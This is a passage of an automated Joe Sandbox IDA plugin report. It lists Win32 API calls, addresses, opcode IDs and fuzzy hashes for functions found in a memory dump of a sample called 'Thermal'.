                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                • String ID:
                                                • API String ID: 1352324309-0
                                                • Opcode ID: 8be41de56365788a9f546a1db0fc7a3f86d14778531a710c42a4aa3bc1ccda0a
                                                • Instruction ID: 7db48f0cc99427c1f16740a789845367c387c20e9b4e065cffdeccd60159e631
                                                • Opcode Fuzzy Hash: 8be41de56365788a9f546a1db0fc7a3f86d14778531a710c42a4aa3bc1ccda0a
                                                • Instruction Fuzzy Hash: A91161B5206B08DBE3308F51DD08FA3BBBCFB00B14F108559A756D6261E7B4E504AFA5
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                • Instruction ID: 8f2730bade12d0417e78c134448a3c31b8d4a228334757a1f92bf317b035e365
                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                • Instruction Fuzzy Hash: CB017B3604814ABBCF1A5E84CC059EE3F36BB9A340B488615FA1858171C33AC9B1EB81
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 007FB956
                                                • ScreenToClient.USER32(?,?), ref: 007FB96E
                                                • ScreenToClient.USER32(?,?), ref: 007FB992
                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007FB9AD
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ClientRectScreen$InvalidateWindow
                                                • String ID:
                                                • API String ID: 357397906-0
                                                • Opcode ID: 09fd65ffd7734ab9f59bf8e1f24d5cc0e73d635d411761a16a5601aeafa79d32
                                                • Instruction ID: b9be99f129e262bf0252e45d37ac50ec5238b845274790f85fedeee7f2b44681
                                                • Opcode Fuzzy Hash: 09fd65ffd7734ab9f59bf8e1f24d5cc0e73d635d411761a16a5601aeafa79d32
                                                • Instruction Fuzzy Hash: 461143B9D00209EFDB41CF98C984AEEBBF9FB58310F108156E924E3610D775AA658F50
                                                APIs
                                                • _memset.LIBCMT ref: 007FBCB6
                                                • _memset.LIBCMT ref: 007FBCC5
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00838F20,00838F64), ref: 007FBCF4
                                                • CloseHandle.KERNEL32 ref: 007FBD06
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memset$CloseCreateHandleProcess
                                                • String ID:
                                                • API String ID: 3277943733-0
                                                • Opcode ID: a1ca3469570973b61ee0dcfbe78292c60f6990b941968064bf0d79d0068cec76
                                                • Instruction ID: 16beb5cb7e992f2637e177be3421f17ddd3cbff2dbce616686b645a4bf75c91b
                                                • Opcode Fuzzy Hash: a1ca3469570973b61ee0dcfbe78292c60f6990b941968064bf0d79d0068cec76
                                                • Instruction Fuzzy Hash: C0F012B2640304FFE75067A5AC09FBB3A5EFB49755F000821BB08E61A2DF795D1097A9
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?), ref: 007D71A1
                                                  • Part of subcall function 007D7C7F: _memset.LIBCMT ref: 007D7CB4
                                                • _memmove.LIBCMT ref: 007D71C4
                                                • _memset.LIBCMT ref: 007D71D1
                                                • LeaveCriticalSection.KERNEL32(?), ref: 007D71E1
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                • String ID:
                                                • API String ID: 48991266-0
                                                • Opcode ID: d8abde0950eff4c5b70ea0b05ed3add1289163795c52db77b03e3f553360c058
                                                • Instruction ID: b15ad8593cb059e84ba9dac8a8e2a5470c14327f2a5b82dde45b6236880f7bc8
                                                • Opcode Fuzzy Hash: d8abde0950eff4c5b70ea0b05ed3add1289163795c52db77b03e3f553360c058
                                                • Instruction Fuzzy Hash: 0BF05E3A200100EBCF416F55EC89B4ABB29FF45321F08C051FE085E22ACB35A921DBB4
                                                APIs
                                                  • Part of subcall function 007716CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00771729
                                                  • Part of subcall function 007716CF: SelectObject.GDI32(?,00000000), ref: 00771738
                                                  • Part of subcall function 007716CF: BeginPath.GDI32(?), ref: 0077174F
                                                  • Part of subcall function 007716CF: SelectObject.GDI32(?,00000000), ref: 00771778
                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007FC3E8
                                                • LineTo.GDI32(00000000,?,?), ref: 007FC3F5
                                                • EndPath.GDI32(00000000), ref: 007FC405
                                                • StrokePath.GDI32(00000000), ref: 007FC413
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                • String ID:
                                                • API String ID: 1539411459-0
                                                • Opcode ID: c92138161bbab4ed09fee7347331756cbd96606113c3441281afbd1ad69d4889
                                                • Instruction ID: 258f551266e7957d744417171c07ff268c27dfee1c5d679664ee38c2adff3d4f
                                                • Opcode Fuzzy Hash: c92138161bbab4ed09fee7347331756cbd96606113c3441281afbd1ad69d4889
                                                • Instruction Fuzzy Hash: EDF05E3100565DBADB636F54AC0DFEE3F99BF05321F148010FB51611E187B85551DFA9
                                                APIs
                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007CAA6F
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 007CAA82
                                                • GetCurrentThreadId.KERNEL32 ref: 007CAA89
                                                • AttachThreadInput.USER32(00000000), ref: 007CAA90
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                • String ID:
                                                • API String ID: 2710830443-0
                                                • Opcode ID: 16cd12cafcd8f466a2ab0a6d8dee344e1a4f0832da5672b10afa352d81e3782d
                                                • Instruction ID: 0ab974f70f72250ac53cae3fdcfa3a9b6a0e3413991eeb2cf4b7fe4e8fbe77ae
                                                • Opcode Fuzzy Hash: 16cd12cafcd8f466a2ab0a6d8dee344e1a4f0832da5672b10afa352d81e3782d
                                                • Instruction Fuzzy Hash: 4DE0393154132CBADB615FA29D0CFEB3F5DFF257A2F008019F51984060CB768550CBA0
                                                APIs
                                                • GetSysColor.USER32(00000008), ref: 0077260D
                                                • SetTextColor.GDI32(?,000000FF), ref: 00772617
                                                • SetBkMode.GDI32(?,00000001), ref: 0077262C
                                                • GetStockObject.GDI32(00000005), ref: 00772634
                                                • GetWindowDC.USER32(?,00000000), ref: 007AC1C4
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 007AC1D1
                                                • GetPixel.GDI32(00000000,?,00000000), ref: 007AC1EA
                                                • GetPixel.GDI32(00000000,00000000,?), ref: 007AC203
                                                • GetPixel.GDI32(00000000,?,?), ref: 007AC223
                                                • ReleaseDC.USER32(?,00000000), ref: 007AC22E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                • String ID:
                                                • API String ID: 1946975507-0
                                                • Opcode ID: acef03ea5ead20595eb3774a8ec36df25595b9dbb1d186b1f7aecdc6e508397c
                                                • Instruction ID: e0cf4193844c083e47275fd5a6aad5c433ecf5d422b9547bbd4b278ad49c4a8a
                                                • Opcode Fuzzy Hash: acef03ea5ead20595eb3774a8ec36df25595b9dbb1d186b1f7aecdc6e508397c
                                                • Instruction Fuzzy Hash: 09E0ED31604248BBDF625FA8AC49BD83B21FB56336F148366FA79980E287754990DF12
                                                APIs
                                                • GetCurrentThread.KERNEL32 ref: 007C9339
                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,007C8F04), ref: 007C9340
                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007C8F04), ref: 007C934D
                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,007C8F04), ref: 007C9354
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CurrentOpenProcessThreadToken
                                                • String ID:
                                                • API String ID: 3974789173-0
                                                • Opcode ID: ea71a4687b649a84fc78eeb2d962f71c54d9b0f7b266cfd0fe3c5facc6aea8b8
                                                • Instruction ID: 2bdba1924f0eb3bc1fdae743d6270d57d2359baceedc8d88396dae0dd6d7d346
                                                • Opcode Fuzzy Hash: ea71a4687b649a84fc78eeb2d962f71c54d9b0f7b266cfd0fe3c5facc6aea8b8
                                                • Instruction Fuzzy Hash: AFE04F726012119BD7A01FB25D0EB563B6CBF50792F11881CB285C9090E6389444CB50
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 007B0679
                                                • GetDC.USER32(00000000), ref: 007B0683
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007B06A3
                                                • ReleaseDC.USER32(?), ref: 007B06C4
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: 484e07f98a03ea68a972704869ae765d36a98d60a48b2b3b468e82d0cb52c0a7
                                                • Instruction ID: 18a6c93d5c047eb684290096bf83cb1c52b62ddfa0928620f7430af69cfd1137
                                                • Opcode Fuzzy Hash: 484e07f98a03ea68a972704869ae765d36a98d60a48b2b3b468e82d0cb52c0a7
                                                • Instruction Fuzzy Hash: 7CE0E5B1800704EFCF919FA0D808B9D7BB2BB9C350F118005F96AA7220CB3985519F50
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 007B068D
                                                • GetDC.USER32(00000000), ref: 007B0697
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007B06A3
                                                • ReleaseDC.USER32(?), ref: 007B06C4
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: 37643d7d4dca7d9e1f15099f65de91240edc7ecdd7745e3d281c306eb0c5458d
                                                • Instruction ID: cdd0483f23650e386e8de9fd454c4fe663e54e658ff019e4d40334f83d936ec7
                                                • Opcode Fuzzy Hash: 37643d7d4dca7d9e1f15099f65de91240edc7ecdd7745e3d281c306eb0c5458d
                                                • Instruction Fuzzy Hash: F1E012B1800704EFCF919FA0D808B9D7BF2BBAC350F108009F96AA7220CB3995518F50
                                                APIs
                                                  • Part of subcall function 0078436A: _wcscpy.LIBCMT ref: 0078438D
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                • __wcsnicmp.LIBCMT ref: 007DB670
                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007DB739
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                • String ID: LPT
                                                • API String ID: 3222508074-1350329615
                                                • Opcode ID: d58d2ea367059dbfff480ca204997bc7e9a9c22b85a3011fbeef5f93b8163ec4
                                                • Instruction ID: 16d8a3434e8ab15bb468c6b044307da56571dbefdc19b51ee0389c11d3a27432
                                                • Opcode Fuzzy Hash: d58d2ea367059dbfff480ca204997bc7e9a9c22b85a3011fbeef5f93b8163ec4
                                                • Instruction Fuzzy Hash: 4E619375A00219EFCB14EF94C895EAEB7B4EF48310F05805BF546AB391DB78AE40CB94
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: #Vx
                                                • API String ID: 4104443479-2004165239
                                                • Opcode ID: 3945e4ae5e908bb5252e31cde469fca44b0dfc0a120e82842c90c0bc4ab87c0f
                                                • Instruction ID: 2ef45ba564db8081cefc57e84499d31085f12407bf8e82249f5d009305facdd5
                                                • Opcode Fuzzy Hash: 3945e4ae5e908bb5252e31cde469fca44b0dfc0a120e82842c90c0bc4ab87c0f
                                                • Instruction Fuzzy Hash: 49516070900609DFCF24CF68C884AEEBBF5FF85304F248529E85AD7250E735A955CB91
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 0077E01E
                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0077E037
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: GlobalMemorySleepStatus
                                                • String ID: @
                                                • API String ID: 2783356886-2766056989
                                                • Opcode ID: f11d52cdd0d056db5b4470639190f297c4586b71aa00d0367dc9d5644d3e7982
                                                • Instruction ID: 80924d0e010cf2badacc72f8adc5357ebfe2a95cf63a3c62d79f9b2706be38e4
                                                • Opcode Fuzzy Hash: f11d52cdd0d056db5b4470639190f297c4586b71aa00d0367dc9d5644d3e7982
                                                • Instruction Fuzzy Hash: 5C516772508744DBE720AF10E88ABAFBBF8FF84354F41884CF2D8411A1DB749528CB66
                                                APIs
                                                • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 007F8186
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007F819B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: '
                                                • API String ID: 3850602802-1997036262
                                                • Opcode ID: 99d997dfa2c97bbccd3e635e02a92f158b7fe5de82473880a7ab62d1a1ea2dae
                                                • Instruction ID: b691ca95371686e8cb32ae2d52989bde893928a95ee0006011cb81ae5da8ae33
                                                • Opcode Fuzzy Hash: 99d997dfa2c97bbccd3e635e02a92f158b7fe5de82473880a7ab62d1a1ea2dae
                                                • Instruction Fuzzy Hash: 55410874A0120D9FDB54CF68C881BEA7BB5FF08300F50056AEA18EB351DB35A956DF91
                                                APIs
                                                • _memset.LIBCMT ref: 007E2C6A
                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007E2CA0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CrackInternet_memset
                                                • String ID: |
                                                • API String ID: 1413715105-2343686810
                                                • Opcode ID: 4b9d9ace07abc543078155873d08de040272631ed4503fd1177506e2a744df3b
                                                • Instruction ID: 1f5d9ab5656d3a3f989b61f56450048a5ce2ff6a0736cbb20c875be9bed2c5d4
                                                • Opcode Fuzzy Hash: 4b9d9ace07abc543078155873d08de040272631ed4503fd1177506e2a744df3b
                                                • Instruction Fuzzy Hash: E7313971D01219EBCF01EFA1DC89AEEBFB9FF08300F100059F915A6262EB355916DBA0
                                                APIs
                                                • DestroyWindow.USER32(?,?,?,?), ref: 007F713C
                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007F7178
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$DestroyMove
                                                • String ID: static
                                                • API String ID: 2139405536-2160076837
                                                • Opcode ID: cfa2627bb55b4deefaae5a70b0799f5e96cd0a89cec7fad60da9526d5385a812
                                                • Instruction ID: 1237f94ea8b8a0bbe1b42f20760cbd7008d1bd6f74cd3390f3aaf7e6303634bc
                                                • Opcode Fuzzy Hash: cfa2627bb55b4deefaae5a70b0799f5e96cd0a89cec7fad60da9526d5385a812
                                                • Instruction Fuzzy Hash: 6531B271100208EEDB149F78CC41BFB73A9FF88720F109619FAA987290DB35AC81CB60
                                                APIs
                                                • _memset.LIBCMT ref: 007D30B8
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D30F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu_memset
                                                • String ID: 0
                                                • API String ID: 2223754486-4108050209
                                                • Opcode ID: 09818c5b8e7ebfea78fa00d4bcb038e9f82ede033c48c581caacb55a1d1ae6ca
                                                • Instruction ID: e95d8b7f8ab77d8a0efd73917d0560e266874217a41f62f688fe18c2c1dd29cd
                                                • Opcode Fuzzy Hash: 09818c5b8e7ebfea78fa00d4bcb038e9f82ede033c48c581caacb55a1d1ae6ca
                                                • Instruction Fuzzy Hash: 1C31063160020EDBEB248F58D885FAEBBB9FF05340F14401AE885A63A0E7799B44CB52
                                                APIs
                                                • __snwprintf.LIBCMT ref: 007E4132
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
